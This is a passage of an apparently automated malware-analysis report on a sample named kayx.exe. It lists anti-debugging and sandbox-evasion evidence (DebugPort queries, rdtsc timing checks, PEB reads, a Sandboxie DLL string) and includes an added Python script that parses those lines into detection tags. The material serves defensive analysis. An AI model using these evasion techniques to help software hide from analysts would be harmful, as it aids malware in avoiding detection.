          Source: C:\Users\user\Desktop\kayx.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\kayx.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00408690 rdtsc
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_004098F0 LdrLoadDll,
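          The evasion evidence above is mechanical enough to triage from the report lines themselves: the rdtsc pair in which ecx is zeroed and the first low dword added to it before the second rdtsc (so the second eax minus ecx is the elapsed cycle count), the thread delay of 922337203685477 ms (which is 0x7FFFFFFFFFFFFFFF in 100 ns units, i.e. the largest relative NtDelayExecution timeout, parking the thread indefinitely), the DebugPort queries, the fs:[30h] reads (the PEB pointer in the 32-bit TEB) and the SBIEDLL.DLL string. The script below is an added example, not Joe Sandbox code and not part of the report; the sample lines are constructed to mirror the entry format above (with a space inserted between the process path and the evidence text), and the 30000 ms "long sleep" threshold and the tag names it emits are assumptions.

```python
"""Triage sandbox-evasion evidence lines of the shape used in this report.
Added example: not Joe Sandbox code; sample lines below are constructed."""
import re
from collections import Counter

# A relative NtDelayExecution timeout is a negative LARGE_INTEGER in 100 ns
# units; the largest magnitude, 0x7FFFFFFFFFFFFFFF, is 922337203685477 ms,
# the exact value in the report: the thread never wakes up on its own.
MAX_RELATIVE_DELAY_MS = (2**63 - 1) // 10_000          # 922337203685477
LONG_SLEEP_MS = 30_000        # assumed threshold, matches "-30000" in the report line
PEB_OFFSET_X86 = 0x30         # TEB+0x30 = ProcessEnvironmentBlock on 32-bit Windows

# Constructed sample lines (addresses are the ones quoted in the report).
SAMPLE_LINES = [
    "Source: C:\\Users\\user\\Desktop\\kayx.exe RDTSC instruction interceptor: First address: 00000000004083C4 second address: 00000000004083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc",
    "Source: C:\\Windows\\SysWOW64\\mstsc.exe RDTSC instruction interceptor: First address: 0000000002F083C4 second address: 0000000002F083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc",
    "Source: C:\\Users\\user\\Desktop\\kayx.exe TID: 6564 Thread sleep time: -922337203685477s >= -30000s",
    "Source: C:\\Users\\user\\Desktop\\kayx.exe Process queried: DebugPort",
    "Source: C:\\Windows\\SysWOW64\\mstsc.exe Process queried: DebugPort",
    "Source: C:\\Users\\user\\Desktop\\kayx.exe Code function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h]",
    "Source: C:\\Users\\user\\Desktop\\kayx.exe Code function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h]",
    "Source: C:\\Users\\user\\Desktop\\kayx.exe Code function: 17_2_00E9B8D0 mov ecx, dword ptr fs:[00000030h]",
    "Source: kayx.exe, 00000001.00000002.355951256.0000000005BC0000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLHEAD%YCLYIDUONHMGOW.VBS",
]

# \S+? followed by \s* accepts both "kayx.exe RDTSC" and the glued "kayx.exeRDTSC".
RDTSC_RE = re.compile(
    r"Source:\s*(?P<proc>\S+?)\s*RDTSC instruction interceptor: First address: "
    r"(?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+) "
    r"instructions: (?P<insns>.+)$")
SLEEP_RE = re.compile(r"Thread sleep time: (?P<ms>-?\d+)s")
DEBUGPORT_RE = re.compile(r"Source:\s*(?P<proc>\S+?)\s*Process queried: DebugPort")
PEB_RE = re.compile(
    r"Code function: (?P<func>\d+_\d+_[0-9A-Fa-f]+) mov (?P<reg>e[a-d]x), "
    r"dword ptr fs:\[(?P<off>[0-9A-Fa-f]+)h\]")
SANDBOX_DLL_RE = re.compile(r"Binary or memory string: .*?(SBIEDLL\.DLL)", re.I)


def parse_rdtsc(line):
    """Decode an RDTSC interceptor line; flag the two-rdtsc delta pattern."""
    m = RDTSC_RE.search(line)
    if not m:
        return None
    insns = [i for i in re.split(r"\s*0x[0-9A-Fa-f]{8}\s*", m["insns"]) if i]
    # First timestamp's low dword (eax) is carried into a register that was
    # zeroed first, then rdtsc runs again: eax - reg is the elapsed cycles.
    timing_check = (len(insns) >= 3 and insns[0] == "rdtsc" and insns[-1] == "rdtsc"
                    and any(i.startswith("add ") and i.endswith(", eax") for i in insns[1:-1]))
    return {"process": m["proc"], "first": int(m["first"], 16),
            "second": int(m["second"], 16),
            "delta_bytes": int(m["second"], 16) - int(m["first"], 16),
            "timing_check": timing_check}


def classify_sleep(ms):
    """Bucket a delay: 'infinite' (max LARGE_INTEGER), 'long', or 'short'."""
    if ms >= MAX_RELATIVE_DELAY_MS:
        return "infinite"
    return "long" if ms >= LONG_SLEEP_MS else "short"


def triage(lines):
    """Summarise evasion evidence across report-style lines."""
    out = {"rdtsc_checks": [], "sleeps": [], "debugport": [],
           "peb_reads": Counter(), "sandbox_dll_strings": []}
    for line in lines:
        r = parse_rdtsc(line)
        if r:
            out["rdtsc_checks"].append(r)
            continue
        m = SLEEP_RE.search(line)
        if m:
            out["sleeps"].append(classify_sleep(abs(int(m["ms"]))))
            continue
        m = DEBUGPORT_RE.search(line)
        if m:
            out["debugport"].append(m["proc"])
            continue
        m = PEB_RE.search(line)
        if m and int(m["off"], 16) == PEB_OFFSET_X86:
            out["peb_reads"][m["func"]] += 1
            continue
        m = SANDBOX_DLL_RE.search(line)
        if m:
            out["sandbox_dll_strings"].append(m.group(1).upper())
    return out


def verdict(summary):
    """Tags a detection rule could key on (names are assumptions)."""
    tags = set()
    if any(r["timing_check"] for r in summary["rdtsc_checks"]):
        tags.add("rdtsc-timing-check")
    if "infinite" in summary["sleeps"]:
        tags.add("infinite-sleep")
    if summary["debugport"]:
        tags.add("debugport-query")
    if summary["peb_reads"]:
        tags.add("peb-access")
    if summary["sandbox_dll_strings"]:
        tags.add("sandbox-dll-name")
    return sorted(tags)


if __name__ == "__main__":
    s = triage(SAMPLE_LINES)
    print(verdict(s))
    print("distinct PEB-reading functions:", len(s["peb_reads"]))
```

          The DebugPort query and the fs:[30h] reads are only suggestive on their own (legitimate runtime code reads the PEB too); the combination with a 6-byte rdtsc/rdtsc delta check and a maximal relative delay is what makes the evasion verdict firm.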
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E24120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E4927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E94257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E18A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E05210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E23A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EBD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]
